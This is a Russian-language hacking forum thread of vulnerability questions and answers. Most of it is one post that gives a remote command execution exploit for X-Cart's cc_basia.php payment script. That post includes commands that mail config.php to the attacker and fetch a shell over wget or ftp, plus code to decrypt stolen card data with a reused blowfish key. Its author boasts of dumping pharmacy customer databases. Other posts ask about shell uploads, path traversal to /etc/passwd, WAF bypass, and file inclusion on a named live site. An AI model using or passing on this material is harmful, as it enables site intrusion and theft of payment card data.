Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Блин я хочу понять почему там у меня проблема я уже столько мучался с этим, не хочу бросать уже столько прочитал но фак не как не могу создать чёртову базу данных
     
  2. EstGi

    EstGi New Member

    Joined:
    9 Sep 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    подскажите пожалуйста что есть на x-cart 4.1.9 Pro
     
  3. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    В чём проблема скачай Linux.Пусть будет и Windows,и Linux .
     
  4. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Цитирую:
    При установке X-Cart требует наличия exec() и выключенного сейфмода для работы скриптов обработки картона. Сам картон и пароли пользователей зашифрованы алгоритмом blowfish и хранятся в БД; ключ blowfish хранится в config.php вместе с настройками для подключения к БД.

    После целенаправленного поиска всех вызовов exec(), был обнаружен незащищенный скрипт, который не фильтрует поступающие данные, попадающие в exec().

    payment/cc_basia.php:
    PHP:
    if($REQUEST_METHOD == "POST" && isset($HTTP_POST_VARS["boamsg"]) && empty($HTTP_POST_VARS["boaref"]))
    { x_load('order');
    $pp_path = func_query_first_cell("SELECT param02 FROM $sql_tbl[ccprocessors] WHERE processor='cc_basia.php'"); $resp = parse_basia_response($HTTP_POST_VARS["boamsg"]); /* ... */ }
    PHP:
    function parse_basia_response($resp)
    {
    global $pp_path; exec(func_shellquote($pp_path)."/decrypt ".$resp." 2>&1";,$out); $resp = $out[0]; /* ... */ }
    Вывода exec() получить нельзя, но команды успешно выполняются.

    Эксплоит работает в интерактивном режиме, поэтому нужен CLI-интерфейс. Первый параметр URL, второй - режим работы. Всего сделал 4 режима:
    • ch/check - проверка доступности exec() через вывод некоторых параметров конфигурации PHP в скрипте check_requirements.php с GET-параметром checkrequirements. В большинстве случаев, если путь указан верно, exec() будет доступен.
    • e/exec - выполнение команд. Здесь надо отметить, что в команде не допускаются символы, которые могут быть заэкранированы addslashes(). Это также особо не препятствует удачному взлому.
    • c/config - отправка config.php на email. Эксплоит запросит ваш email и выполнит такую команду:
      cat ../config.php | mail $email
    • u/upload - загрузка файлов с помощью wget. Будут запрошены URL удаленного файла, а также локальный путь для сохранения. Локальный путь нужно указывать относительно папки, где установлен X-Cart. Его можно не указывать, тогда будет использоваться файл skin1/main/error_realtime_shipping_disabled.php. По завершени выполнения команды будет предложено применить touch на созданном файле.
      Если файлы не закачиваются, то вероятно wget'а нет или к нему запрещен доступ. Самый верный вариант - заливать с помощью ftp. Для этого запускаем второй режим и выполняем команду:
      cd ../skin1/main/; echo user [user] [pass]>ftp.txt; echo prompt>>ftp.txt; echo get s.php>>ftp.txt; echo bye>>ftp.txt; ftp -n -v [host] < ftp.txt
    С помощью уязвимости слил 3 отменных базы с крупных аптек, так что фарму прошу не трогать.
    Для добычи картона, необходимо получить blowfish ключ из config.php. Чтобы расшифровать, выполняем такой код:
    PHP:
    <?php include 'blowfish.php'; $bf = new ctBlowfish();
    echo $bf->mdecrypt('06a907f395516c9dfb4489e7de21d50141fabf5b9b007787', 'bb3704bed294be6d89b840b3fc184039');
    blowfish.php - это отредактированный скрипт из поставки X-Cart (см. в атаче); первый аргумент функции это зашифрованное значение, второй - ключ. Кстати на всех сайтах, которые мне попадались - ключ был один и тот же: bb3704bed294be6d89b840b3fc184039. Пароли админов расшифровываются аналогичным способом.
     
    EstGi likes this.
  5. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Linux как вторую ОС не вариант поставить ?..
     
  6. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    уже всё, разобрался во всём
     
  7. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    Когда то давно видел пример запросов в иньекции с использованием group_concat() и использованием чего то по сути похожего на лимит, выдирая инфу по блокам последовательно. Воспроизвести самому не вышло и найти не смог, не подскажите ?
     
  8. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Если ты задашь сей вопрос рано тебе еще использовать такие тулзы. Если ты выйдешь за NAT, т.е. белый айпишник купишь, то можешь использовать метасплоит на что угодно. Взломать можно не всё.
     
    _________________________
    #1388 SooLFaa, 12 Sep 2016
    Last edited: 12 Sep 2016
  9. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Раньше была db_autopwn команда, но в новой версии её вырубили, а как её вернуть читай тут. И да, армитаж гавно.
    ЛИНК
     
    _________________________
  10. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Если не знаешь полезных нагрузок по WAF BYPASS, то либо читай статью Бертони ТУТ, Либо включай поочереди тамперы как уже говорили (ключ --tamper) в SQLMAP
     
    _________________________
  11. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Armitage для начала сойдёт .
     
  12. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    По мне так очень тупой гуишник для скрипткиди. Любая из трех книг по метасплоиту даст куда больше профита чем тупое использование армитажа. Но это мое ИМХО.
     
    _________________________
  13. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    man crunch

    crunch --help
     
  14. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
  15. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    есть такой код ,выводит только список файлов и папок в директорий , если сделать ../../../../../../../etc/passwd то пишет tmp array , а если ../../../../../../../etc то покажет список всех файлов и папок в директории.
    Вопрос ,реально ли прочитать содержимое файла через этот код?

    PHP:
    <?php
    require_once ("common.inc.php");
    echo 
    '<pre>';
    echo 
    "<b>" sys_get_temp_dir() ."</b> <br>";
    $path "../images/";
    if (
    $_REQUEST["path"]) $path $_REQUEST["path"] .'/';
    $dir = new Game_Tool_Disk_Directory($path, array (
            
    "png",
            
    "gif",
            
    "jpg",
            
    "jpeg" ));

    print_r($dir->getDirs());

    echo 
    '<hr>';

    print_r($dir->getFiles());

    echo 
    '<hr></pre>';

    if (
    $dir->getDirCount()) {
        while ( 
    $directory $dir->nextDir() ) {

             echo 
    "[<a href='?path={$path}{$directory}'>" $directory "</a>]<br>";
        }
    }

    echo 
    '<hr>';

    if (
    $dir->getFileCount()) {
        while ( 
    $file $dir->nextFile() ) {
            echo 
    "[<a href='?compare=bla'>" $file "</a>]<br>";
           
            echo 
    "<img width='100px' src='" $path $file "'><br>";
        }
    }

     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Тут бы класс посмотреть Game_Tool_Disk_Directory, что в нем прописано, ну а логика кода подсказывает что нет
     
    _________________________
  17. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    194
    Likes Received:
    5
    Reputations:
    0
    Подскажите как узнать путь до конфига Microsoft IIS.На линуксе знаю что /etc/passwd,httpd.conf и тд
     
  18. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    8
    Reputations:
    6
    какие способы есть заливки шелла в eCom ?
     
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    PHP:
    <?php

    get_header
    ();

    echo 
    '<div id="wrapper">';



    ?> 
    <center><font class="poem"><b>&iexcl;ES INCORRECTO!</b></font>
    <br><br>
    <?php

    $idautor 
    = (int)$_GET['idautor'];

    $idquote = (int)$_GET['idquote'];
    $idautor2 = (int)$_GET['idautor2'];


    $query "SELECT * FROM cms_topics where topicid = $idautor";
      
    $result mysql_query($query)
        or die (
    "no anda num 3");
      while (
    $row mysql_fetch_array($result))
      {
        
    $aux utf8_encode($row['topicname']);
      } 
      echo 
    "<center>Elegiste a <b>$aux</b> como el autor del poema:</center>";
      echo 
    "<br><br>";

    // Imprime el quote segun el parametro pasado por url $idquote

    $query "SELECT * FROM cms_stories where sid = $idquote";
    $result mysql_query($query)
      or die (
    "no anda num 3");
    while (
    $row mysql_fetch_array($result))
      {
      
    $aux utf8_encode($row['hometext']);
      }   
      echo 
    "<div class='juegocen'><center>$aux</center></div>";

    echo 
    "<br><br>";

    // Imprime el autor segun el parametro pasado por url $idautor

    $query "SELECT * FROM cms_topics where topicid = $idautor2";
      
    $result mysql_query($query)
        or die (
    "no anda num 3");
      while (
    $row mysql_fetch_array($result))
      {
        
    $aux utf8_encode($row['topicname']);
      } 
       echo 
    "<center>Sin embargo, <b>$aux</b> es quien lo escribi&oacute;.</center>";

    echo 
    "<br><br><br>";
    if (
    $_COOKIE['whowrong'] + $_COOKIE['whoright'] + != 10)
    {
      
    $nextq $_COOKIE['whowrong'] + $_COOKIE['whoright'] + 2;
      echo 
    "<center><a href=\"mylink.php\"><b>PR&Oacute;XIMO POEMA ($nextq de 10)</b></a>";
      echo 
    "<br><br><font face=\"Verdana\" size=\"1\" color=\"#000000\"><a href=\"reset.php\">Reiniciar juego</a></font></center>";
    }
    else
    {
      echo 
    "<center><a href=\"mylink.php\"><b>FIN. Enviar tu puntaje.</b></center></a>";

    mysql_close($conecta);
    ?>
    </div>
      <!-- fin de content !-->
    <?php

    get_footer
    ();
    ?>
     
    _________________________
    RWD likes this.
  20. PlataOPlomo

    PlataOPlomo New Member

    Joined:
    1 Sep 2016
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    http://analitpribor.com/bank.php?section=products/bank&item=bankmebelf
    у кого нибудь получится локальный инклуд раскрутить?) Парился, парился, не получилось)
    Ядовитый ноль похоже не работает, заинклудить ничего не удалось